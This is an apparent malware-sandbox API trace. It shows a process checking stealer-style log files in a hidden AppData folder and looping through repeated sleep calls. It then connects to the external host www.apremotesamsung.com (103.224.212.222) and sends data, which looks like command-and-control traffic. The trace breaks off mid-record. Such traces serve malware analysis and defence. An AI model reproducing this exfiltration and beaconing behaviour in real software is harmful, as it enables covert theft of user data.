NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0200.060] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0200.060] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f84c0) returned 1 [0200.060] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.060] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0200.060] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0200.060] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9480) returned 1 [0200.060] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.060] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0200.060] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0200.060] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9480) returned 1 [0200.060] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.060] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0200.061] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0200.061] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f84c0) returned 1 [0200.061] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.061] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0200.061] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0200.061] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f84c0) returned 1 [0200.061] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.061] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0200.061] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0200.061] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9480) returned 1 [0200.061] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.061] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0200.061] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0200.061] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7500) returned 1 [0200.061] Sleep (dwMilliseconds=0x7d0) [0200.063] Sleep (dwMilliseconds=0x7d0) [0200.064] Sleep (dwMilliseconds=0x7d0) [0200.066] Sleep (dwMilliseconds=0x7d0) [0200.069] Sleep (dwMilliseconds=0x7d0) [0200.071] Sleep (dwMilliseconds=0x7d0) [0200.072] Sleep (dwMilliseconds=0x7d0) [0200.074] Sleep (dwMilliseconds=0x7d0) [0200.075] Sleep (dwMilliseconds=0x7d0) [0200.077] Sleep (dwMilliseconds=0x7d0) [0200.078] Sleep (dwMilliseconds=0x7d0) [0200.080] Sleep (dwMilliseconds=0x7d0) [0200.081] Sleep (dwMilliseconds=0x7d0) [0200.083] Sleep (dwMilliseconds=0x7d0) [0200.085] Sleep (dwMilliseconds=0x7d0) [0200.087] Sleep (dwMilliseconds=0x7d0) [0200.088] Sleep (dwMilliseconds=0x7d0) [0200.090] Sleep (dwMilliseconds=0x7d0) [0200.091] Sleep (dwMilliseconds=0x7d0) [0200.093] Sleep (dwMilliseconds=0x7d0) [0200.094] Sleep (dwMilliseconds=0x7d0) [0200.097] Sleep (dwMilliseconds=0x7d0) [0200.098] Sleep (dwMilliseconds=0x7d0) [0200.099] Sleep (dwMilliseconds=0x7d0) [0200.101] Sleep (dwMilliseconds=0x7d0) [0200.103] Sleep (dwMilliseconds=0x7d0) [0200.104] Sleep (dwMilliseconds=0x7d0) [0200.106] Sleep (dwMilliseconds=0x7d0) [0200.107] Sleep (dwMilliseconds=0x7d0) [0200.109] Sleep (dwMilliseconds=0x7d0) [0200.110] Sleep (dwMilliseconds=0x7d0) [0200.112] Sleep (dwMilliseconds=0x7d0) [0200.113] Sleep (dwMilliseconds=0x7d0) [0200.115] Sleep (dwMilliseconds=0x7d0) [0200.116] Sleep (dwMilliseconds=0x7d0) [0200.118] Sleep (dwMilliseconds=0x7d0) [0200.119] Sleep (dwMilliseconds=0x7d0) [0200.121] Sleep (dwMilliseconds=0x7d0) [0200.122] Sleep (dwMilliseconds=0x7d0) [0200.124] Sleep (dwMilliseconds=0x7d0) [0200.125] Sleep (dwMilliseconds=0x7d0) [0200.128] Sleep (dwMilliseconds=0x7d0) [0200.129] Sleep (dwMilliseconds=0x7d0) [0200.131] Sleep (dwMilliseconds=0x7d0) [0200.132] Sleep (dwMilliseconds=0x7d0) [0200.134] Sleep (dwMilliseconds=0x7d0) [0200.135] Sleep (dwMilliseconds=0x7d0) [0200.137] Sleep (dwMilliseconds=0x7d0) [0200.138] Sleep (dwMilliseconds=0x7d0) [0200.140] Sleep (dwMilliseconds=0x7d0) [0200.141] Sleep (dwMilliseconds=0x7d0) [0200.143] Sleep (dwMilliseconds=0x7d0) [0200.144] Sleep (dwMilliseconds=0x7d0) [0200.146] Sleep (dwMilliseconds=0x7d0) [0200.147] Sleep (dwMilliseconds=0x7d0) [0200.149] Sleep (dwMilliseconds=0x7d0) [0200.150] Sleep (dwMilliseconds=0x7d0) [0200.152] Sleep (dwMilliseconds=0x7d0) [0200.153] Sleep (dwMilliseconds=0x7d0) [0200.155] Sleep (dwMilliseconds=0x7d0) [0200.156] Sleep (dwMilliseconds=0x7d0) [0200.160] Sleep (dwMilliseconds=0x7d0) [0200.162] Sleep (dwMilliseconds=0x7d0) [0200.163] Sleep (dwMilliseconds=0x7d0) [0200.165] Sleep (dwMilliseconds=0x7d0) [0200.166] Sleep (dwMilliseconds=0x7d0) [0200.168] Sleep (dwMilliseconds=0x7d0) [0200.169] Sleep (dwMilliseconds=0x7d0) [0200.171] Sleep (dwMilliseconds=0x7d0) [0200.172] Sleep (dwMilliseconds=0x7d0) [0200.174] Sleep (dwMilliseconds=0x7d0) [0200.175] Sleep (dwMilliseconds=0x7d0) [0200.177] Sleep (dwMilliseconds=0x7d0) [0200.178] Sleep (dwMilliseconds=0x7d0) [0200.180] Sleep (dwMilliseconds=0x7d0) [0200.181] Sleep (dwMilliseconds=0x7d0) [0200.183] Sleep (dwMilliseconds=0x7d0) [0200.185] Sleep (dwMilliseconds=0x7d0) [0200.187] Sleep (dwMilliseconds=0x7d0) [0200.188] Sleep (dwMilliseconds=0x7d0) [0200.192] Sleep (dwMilliseconds=0x7d0) [0200.193] Sleep (dwMilliseconds=0x7d0) [0200.195] Sleep (dwMilliseconds=0x7d0) [0200.196] Sleep (dwMilliseconds=0x7d0) [0200.198] Sleep (dwMilliseconds=0x7d0) [0200.199] Sleep (dwMilliseconds=0x7d0) [0200.202] Sleep (dwMilliseconds=0x7d0) [0200.203] Sleep (dwMilliseconds=0x7d0) [0200.205] Sleep (dwMilliseconds=0x7d0) [0200.206] Sleep (dwMilliseconds=0x7d0) [0200.208] Sleep (dwMilliseconds=0x7d0) [0200.209] Sleep (dwMilliseconds=0x7d0) [0200.211] Sleep (dwMilliseconds=0x7d0) [0200.212] Sleep (dwMilliseconds=0x7d0) [0200.214] Sleep (dwMilliseconds=0x7d0) [0200.215] Sleep (dwMilliseconds=0x7d0) [0200.217] Sleep (dwMilliseconds=0x7d0) [0200.219] Sleep (dwMilliseconds=0x7d0) [0200.220] Sleep (dwMilliseconds=0x7d0) [0200.221] Sleep (dwMilliseconds=0x7d0) [0200.224] Sleep (dwMilliseconds=0x7d0) [0200.225] Sleep (dwMilliseconds=0x7d0) [0200.227] Sleep (dwMilliseconds=0x7d0) [0200.228] Sleep (dwMilliseconds=0x7d0) [0200.230] Sleep (dwMilliseconds=0x7d0) [0200.231] Sleep (dwMilliseconds=0x7d0) [0200.233] Sleep (dwMilliseconds=0x7d0) [0200.234] Sleep (dwMilliseconds=0x7d0) [0200.236] Sleep (dwMilliseconds=0x7d0) [0200.237] Sleep (dwMilliseconds=0x7d0) [0200.239] Sleep (dwMilliseconds=0x7d0) [0200.240] Sleep (dwMilliseconds=0x7d0) [0200.242] Sleep (dwMilliseconds=0x7d0) [0200.243] Sleep (dwMilliseconds=0x7d0) [0200.245] Sleep (dwMilliseconds=0x7d0) [0200.246] Sleep (dwMilliseconds=0x7d0) [0200.248] Sleep (dwMilliseconds=0x7d0) [0200.249] Sleep (dwMilliseconds=0x7d0) [0200.251] Sleep (dwMilliseconds=0x7d0) [0200.252] Sleep (dwMilliseconds=0x7d0) [0200.254] Sleep (dwMilliseconds=0x7d0) [0200.255] Sleep (dwMilliseconds=0x7d0) [0200.259] Sleep (dwMilliseconds=0x7d0) [0200.260] Sleep (dwMilliseconds=0x7d0) [0200.262] Sleep (dwMilliseconds=0x7d0) [0200.264] Sleep (dwMilliseconds=0x7d0) [0200.265] Sleep (dwMilliseconds=0x7d0) [0200.266] Sleep (dwMilliseconds=0x7d0) [0200.268] Sleep (dwMilliseconds=0x7d0) [0200.269] Sleep (dwMilliseconds=0x7d0) [0200.271] Sleep (dwMilliseconds=0x7d0) [0200.272] Sleep (dwMilliseconds=0x7d0) [0200.274] Sleep (dwMilliseconds=0x7d0) [0200.275] Sleep (dwMilliseconds=0x7d0) [0200.277] Sleep (dwMilliseconds=0x7d0) [0200.278] Sleep (dwMilliseconds=0x7d0) [0200.280] Sleep (dwMilliseconds=0x7d0) [0200.281] Sleep (dwMilliseconds=0x7d0) [0200.283] Sleep (dwMilliseconds=0x7d0) [0200.296] Sleep (dwMilliseconds=0x7d0) [0200.297] Sleep (dwMilliseconds=0x7d0) [0200.299] Sleep (dwMilliseconds=0x7d0) [0200.300] Sleep (dwMilliseconds=0x7d0) [0200.302] Sleep (dwMilliseconds=0x7d0) [0200.303] Sleep (dwMilliseconds=0x7d0) [0200.305] Sleep (dwMilliseconds=0x7d0) [0200.306] Sleep (dwMilliseconds=0x7d0) [0200.308] Sleep (dwMilliseconds=0x7d0) [0200.309] Sleep (dwMilliseconds=0x7d0) [0200.311] Sleep (dwMilliseconds=0x7d0) [0200.312] Sleep (dwMilliseconds=0x7d0) [0200.314] Sleep (dwMilliseconds=0x7d0) [0200.315] Sleep (dwMilliseconds=0x7d0) [0200.317] Sleep (dwMilliseconds=0x7d0) [0200.318] Sleep (dwMilliseconds=0x7d0) [0200.320] Sleep (dwMilliseconds=0x7d0) [0200.321] Sleep (dwMilliseconds=0x7d0) [0200.323] Sleep (dwMilliseconds=0x7d0) [0200.324] Sleep (dwMilliseconds=0x7d0) [0200.326] Sleep (dwMilliseconds=0x7d0) [0200.329] Sleep (dwMilliseconds=0x7d0) [0200.330] Sleep (dwMilliseconds=0x7d0) [0200.332] Sleep (dwMilliseconds=0x7d0) [0200.333] Sleep (dwMilliseconds=0x7d0) [0200.335] Sleep (dwMilliseconds=0x7d0) [0200.336] Sleep (dwMilliseconds=0x7d0) [0200.338] Sleep (dwMilliseconds=0x7d0) [0200.339] Sleep (dwMilliseconds=0x7d0) [0200.341] Sleep (dwMilliseconds=0x7d0) [0200.342] Sleep (dwMilliseconds=0x7d0) [0200.344] Sleep (dwMilliseconds=0x7d0) [0200.345] Sleep (dwMilliseconds=0x7d0) [0200.347] Sleep (dwMilliseconds=0x7d0) [0200.348] Sleep (dwMilliseconds=0x7d0) [0200.350] Sleep (dwMilliseconds=0x7d0) [0200.351] Sleep (dwMilliseconds=0x7d0) [0200.353] Sleep (dwMilliseconds=0x7d0) [0200.354] Sleep (dwMilliseconds=0x7d0) [0200.356] Sleep (dwMilliseconds=0x7d0) [0200.357] Sleep (dwMilliseconds=0x7d0) [0200.359] Sleep (dwMilliseconds=0x7d0) [0200.360] Sleep (dwMilliseconds=0x7d0) [0200.362] Sleep (dwMilliseconds=0x7d0) [0200.363] Sleep (dwMilliseconds=0x7d0) [0200.366] Sleep (dwMilliseconds=0x7d0) [0200.368] Sleep (dwMilliseconds=0x7d0) [0200.369] Sleep (dwMilliseconds=0x7d0) [0200.371] Sleep (dwMilliseconds=0x7d0) [0200.372] Sleep (dwMilliseconds=0x7d0) [0200.374] Sleep (dwMilliseconds=0x7d0) [0200.375] Sleep (dwMilliseconds=0x7d0) [0200.377] Sleep (dwMilliseconds=0x7d0) [0200.378] Sleep (dwMilliseconds=0x7d0) [0200.380] Sleep (dwMilliseconds=0x7d0) [0200.381] Sleep (dwMilliseconds=0x7d0) [0200.383] Sleep (dwMilliseconds=0x7d0) [0200.385] Sleep (dwMilliseconds=0x7d0) [0200.387] Sleep (dwMilliseconds=0x7d0) [0200.388] Sleep (dwMilliseconds=0x7d0) [0200.390] Sleep (dwMilliseconds=0x7d0) [0200.392] Sleep (dwMilliseconds=0x7d0) [0200.393] Sleep (dwMilliseconds=0x7d0) [0200.396] Sleep (dwMilliseconds=0x7d0) [0200.397] Sleep (dwMilliseconds=0x7d0) [0200.399] Sleep (dwMilliseconds=0x7d0) [0200.400] Sleep (dwMilliseconds=0x7d0) [0200.402] Sleep (dwMilliseconds=0x7d0) [0200.404] Sleep (dwMilliseconds=0x7d0) [0200.406] Sleep (dwMilliseconds=0x7d0) [0200.407] Sleep (dwMilliseconds=0x7d0) [0200.409] Sleep (dwMilliseconds=0x7d0) [0200.410] Sleep (dwMilliseconds=0x7d0) [0200.412] Sleep (dwMilliseconds=0x7d0) [0200.413] Sleep (dwMilliseconds=0x7d0) [0200.415] Sleep (dwMilliseconds=0x7d0) [0200.416] Sleep (dwMilliseconds=0x7d0) [0200.418] Sleep (dwMilliseconds=0x7d0) [0200.419] Sleep (dwMilliseconds=0x7d0) [0200.421] Sleep (dwMilliseconds=0x7d0) [0200.422] Sleep (dwMilliseconds=0x7d0) [0200.424] Sleep (dwMilliseconds=0x7d0) [0200.425] Sleep (dwMilliseconds=0x7d0) [0200.427] Sleep (dwMilliseconds=0x7d0) [0200.429] Sleep (dwMilliseconds=0x7d0) [0200.430] Sleep (dwMilliseconds=0x7d0) [0200.432] Sleep (dwMilliseconds=0x7d0) [0200.433] Sleep (dwMilliseconds=0x7d0) [0200.435] Sleep (dwMilliseconds=0x7d0) [0200.437] Sleep (dwMilliseconds=0x7d0) [0200.438] Sleep (dwMilliseconds=0x7d0) [0200.440] Sleep (dwMilliseconds=0x7d0) [0200.443] Sleep (dwMilliseconds=0x7d0) [0200.445] Sleep (dwMilliseconds=0x7d0) [0200.447] Sleep (dwMilliseconds=0x7d0) [0200.448] Sleep (dwMilliseconds=0x7d0) [0200.450] Sleep (dwMilliseconds=0x7d0) [0200.451] Sleep (dwMilliseconds=0x7d0) [0200.453] Sleep (dwMilliseconds=0x7d0) [0200.455] Sleep (dwMilliseconds=0x7d0) [0200.457] Sleep (dwMilliseconds=0x7d0) [0200.458] Sleep (dwMilliseconds=0x7d0) [0200.460] Sleep (dwMilliseconds=0x7d0) [0200.467] Sleep (dwMilliseconds=0x7d0) [0200.468] Sleep (dwMilliseconds=0x7d0) [0200.470] Sleep (dwMilliseconds=0x7d0) [0200.471] Sleep (dwMilliseconds=0x7d0) [0200.477] Sleep (dwMilliseconds=0x7d0) [0200.478] Sleep (dwMilliseconds=0x7d0) [0200.479] Sleep (dwMilliseconds=0x7d0) [0200.481] Sleep (dwMilliseconds=0x7d0) [0200.482] Sleep (dwMilliseconds=0x7d0) [0200.521] Sleep (dwMilliseconds=0x7d0) [0200.522] Sleep (dwMilliseconds=0x7d0) [0200.523] Sleep (dwMilliseconds=0x7d0) [0200.525] Sleep (dwMilliseconds=0x7d0) [0200.526] Sleep (dwMilliseconds=0x7d0) [0200.528] Sleep (dwMilliseconds=0x7d0) [0200.529] Sleep (dwMilliseconds=0x7d0) [0200.531] Sleep (dwMilliseconds=0x7d0) [0200.533] Sleep (dwMilliseconds=0x7d0) [0200.534] Sleep (dwMilliseconds=0x7d0) [0200.536] Sleep (dwMilliseconds=0x7d0) [0200.537] Sleep (dwMilliseconds=0x7d0) [0200.543] Sleep (dwMilliseconds=0x7d0) [0200.544] Sleep (dwMilliseconds=0x7d0) [0200.546] Sleep (dwMilliseconds=0x7d0) [0200.547] Sleep (dwMilliseconds=0x7d0) [0200.549] Sleep (dwMilliseconds=0x7d0) [0200.554] Sleep (dwMilliseconds=0x7d0) [0200.555] Sleep (dwMilliseconds=0x7d0) [0200.557] Sleep (dwMilliseconds=0x7d0) [0200.558] Sleep (dwMilliseconds=0x7d0) [0200.560] Sleep (dwMilliseconds=0x7d0) [0200.564] Sleep (dwMilliseconds=0x7d0) [0200.566] Sleep (dwMilliseconds=0x7d0) [0200.567] Sleep (dwMilliseconds=0x7d0) [0200.569] Sleep (dwMilliseconds=0x7d0) [0200.570] Sleep (dwMilliseconds=0x7d0) [0200.572] Sleep (dwMilliseconds=0x7d0) [0200.573] Sleep (dwMilliseconds=0x7d0) [0200.575] Sleep (dwMilliseconds=0x7d0) [0200.576] Sleep (dwMilliseconds=0x7d0) [0200.578] Sleep (dwMilliseconds=0x7d0) [0200.579] Sleep (dwMilliseconds=0x7d0) [0200.581] Sleep (dwMilliseconds=0x7d0) [0200.586] Sleep (dwMilliseconds=0x7d0) [0200.587] Sleep (dwMilliseconds=0x7d0) [0200.589] Sleep (dwMilliseconds=0x7d0) [0200.590] Sleep (dwMilliseconds=0x7d0) [0200.592] Sleep (dwMilliseconds=0x7d0) [0200.593] Sleep (dwMilliseconds=0x7d0) [0200.597] Sleep (dwMilliseconds=0x7d0) [0200.599] Sleep (dwMilliseconds=0x7d0) [0200.600] Sleep (dwMilliseconds=0x7d0) [0200.602] Sleep (dwMilliseconds=0x7d0) [0200.603] Sleep (dwMilliseconds=0x7d0) [0200.609] Sleep (dwMilliseconds=0x7d0) [0200.611] Sleep (dwMilliseconds=0x7d0) [0200.612] Sleep (dwMilliseconds=0x7d0) [0200.615] Sleep (dwMilliseconds=0x7d0) [0200.616] Sleep (dwMilliseconds=0x7d0) [0200.618] Sleep (dwMilliseconds=0x7d0) [0200.619] Sleep (dwMilliseconds=0x7d0) [0200.621] Sleep (dwMilliseconds=0x7d0) [0200.622] Sleep (dwMilliseconds=0x7d0) [0200.624] Sleep (dwMilliseconds=0x7d0) [0200.625] Sleep (dwMilliseconds=0x7d0) [0200.631] Sleep (dwMilliseconds=0x7d0) [0200.632] Sleep (dwMilliseconds=0x7d0) [0200.634] Sleep (dwMilliseconds=0x7d0) [0200.635] Sleep (dwMilliseconds=0x7d0) [0200.637] Sleep (dwMilliseconds=0x7d0) [0200.642] Sleep (dwMilliseconds=0x7d0) [0200.643] Sleep (dwMilliseconds=0x7d0) [0200.645] Sleep (dwMilliseconds=0x7d0) [0200.646] Sleep (dwMilliseconds=0x7d0) [0200.648] Sleep (dwMilliseconds=0x7d0) [0200.652] Sleep (dwMilliseconds=0x7d0) [0200.653] Sleep (dwMilliseconds=0x7d0) [0200.655] Sleep (dwMilliseconds=0x7d0) [0200.656] Sleep (dwMilliseconds=0x7d0) [0200.658] Sleep (dwMilliseconds=0x7d0) [0200.659] Sleep (dwMilliseconds=0x7d0) [0200.660] Sleep (dwMilliseconds=0x7d0) [0200.662] Sleep (dwMilliseconds=0x7d0) [0200.664] Sleep (dwMilliseconds=0x7d0) [0200.665] Sleep (dwMilliseconds=0x7d0) [0200.667] Sleep (dwMilliseconds=0x7d0) [0200.668] Sleep (dwMilliseconds=0x7d0) [0200.670] Sleep (dwMilliseconds=0x7d0) [0200.674] Sleep (dwMilliseconds=0x7d0) [0200.675] Sleep (dwMilliseconds=0x7d0) [0200.677] Sleep (dwMilliseconds=0x7d0) [0200.678] Sleep (dwMilliseconds=0x7d0) [0200.681] Sleep (dwMilliseconds=0x7d0) [0200.686] Sleep (dwMilliseconds=0x7d0) [0200.687] Sleep (dwMilliseconds=0x7d0) [0200.689] Sleep (dwMilliseconds=0x7d0) [0200.690] Sleep (dwMilliseconds=0x7d0) [0200.692] Sleep (dwMilliseconds=0x7d0) [0200.693] Sleep (dwMilliseconds=0x7d0) [0200.695] Sleep (dwMilliseconds=0x7d0) [0200.696] Sleep (dwMilliseconds=0x7d0) [0200.698] Sleep (dwMilliseconds=0x7d0) [0200.699] Sleep (dwMilliseconds=0x7d0) [0200.701] Sleep (dwMilliseconds=0x7d0) [0200.705] Sleep (dwMilliseconds=0x7d0) [0200.709] Sleep (dwMilliseconds=0x7d0) [0200.710] Sleep (dwMilliseconds=0x7d0) [0200.712] Sleep (dwMilliseconds=0x7d0) [0200.713] Sleep (dwMilliseconds=0x7d0) [0200.720] Sleep (dwMilliseconds=0x7d0) [0200.722] Sleep (dwMilliseconds=0x7d0) [0200.723] Sleep (dwMilliseconds=0x7d0) [0200.725] Sleep (dwMilliseconds=0x7d0) [0200.727] socket (af=2, type=1, protocol=6) returned 0x1c60 [0200.732] getaddrinfo (in: pNodeName="www.apremotesamsung.com", pServiceName="80", pHints=0x9e76f58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9e76f88 | out: ppResult=0x9e76f88*=0xa05ed50*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f943f0*(sa_family=2, sin_port=0x50, sin_addr="103.224.212.222"), ai_next=0x0)) returned 0 [0200.948] connect (s=0x1c60, name=0x9f943f0*(sa_family=2, sin_port=0x50, sin_addr="103.224.212.222"), namelen=16) returned 0 [0201.121] send (s=0x1c60, buf=0x82e10fa*, len=173, flags=0) returned 173 [0201.121] setsockopt (s=0x1c60, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0201.122] recv (in: s=0x1c60, buf=0x127cf040, len=2048000, flags=0 | out: buf=0x127cf040*) returned 407 [0201.352] closesocket (s=0x1c60) returned 0 [0201.353] Sleep (dwMilliseconds=0x7d0) [0201.355] RtlDosPathNameToNtPathName_U (in: 